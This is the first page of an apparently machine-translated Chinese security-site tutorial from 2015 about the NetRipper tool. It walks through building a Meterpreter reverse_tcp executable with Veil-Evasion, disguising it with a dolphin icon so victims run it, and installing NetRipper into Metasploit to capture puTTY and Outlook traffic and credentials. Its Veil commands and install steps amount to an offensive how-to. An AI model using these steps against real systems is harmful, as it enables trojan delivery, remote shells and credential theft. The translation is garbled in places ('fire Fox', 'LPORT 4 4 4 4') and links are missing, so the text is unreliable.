Using Metasploit/NetRipper sniffing encrypted puTTY/Outlook account-vulnerability warning-the black bar safety net

ID MYHACK58:62201565934
Type myhack58
Reporter 佚名
Modified 2015-08-19T00:00:00


! /Article/UploadPic/2015-8/2015819145144782.jpg

This year,the 2 3 annual Defcon conference in the USA Las Vegas Grand opening,and NetRipper it is in the current Defcon General Assembly for the first time available. NetRipper is a tool for Windows operating system vulnerabilities using the tool,it can use the API hooking from a low-privileged user where the intercepted network communication data and the encryption-related information,but also can capture the clear text communication data as well as encrypted communication data.

Click on the following address,can be in the Github home page, see about the project details:


NetRipper can provide users with a standalone command-line injectionmethod,if you can successfully invade a Windows operating system of the target host,then it can help you in target host system to load/execute arbitrary commands. But this article is going to introduce is a pre-compiled“malicious”executable method,this function is performed by the Meterpreter, a built-in reverse_tcp shell. We should also note,NetRipper can also fire Fox browser,Chrome,Lync(Skype for business),puTTY,WinSCP,SQL Server Management Program, and Microsoft Outlook client data injection and capture relevant network data. So,this article to be about is related to puTTY and Outlook,and related operations do not need to give administrator permissions or system permissions.

Exploit(experimental conditions)can be accomplished by the following steps:

  1. Use Veil-Evasion to create a“malicious”reverse_tcp shell executable script. Execution of this file the user will see on the screen appears a cute Dolphin.

! /Article/UploadPic/2015-8/2015819145144198.jpg

  1. The use of a previously already present in the system vulnerability,and then get a reverse shell.

Our focus of discussion will be placed in the reverse_tcp shell executable method.

Use Veil-Evasion to create one. exe file:

use python/meterpreter/rev_tcp

! /Article/UploadPic/2015-8/2015819145144168.jpg


set LPORT 4 4 4 4



! /Article/UploadPic/2015-8/2015819145147443.jpg

For output files set an initial file name,and then select the need to use the payload constructor.

! /Article/UploadPic/2015-8/2015819145147893.jpg

! /Article/UploadPic/2015-8/2015819145150209.jpg

And then with a Dolphin of the picture will be exe-executable file icons replace them,because the Dolphin is very special. In this step of the operation,you can use theResource Hackerto achieve.

! /Article/UploadPic/2015-8/2015819145150166.jpg

In the use of Metasploit before,you need to download NetRipper and configure it:

(NetRipper install document:Readme):

git clone cd NetRipper cd Metasploit cp netripper. rb /usr/share/metasploit-framework/modules/post/windows/gather/ mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper g++ -Wall netripper.cpp -o netripper cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/ cd ../Release cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/netripper/DLL.dll

Configure Metasploit

Settings you'll need to use the reverse processor,and start it:

! /Article/UploadPic/2015-8/2015819145150789.jpg

[1] [2] next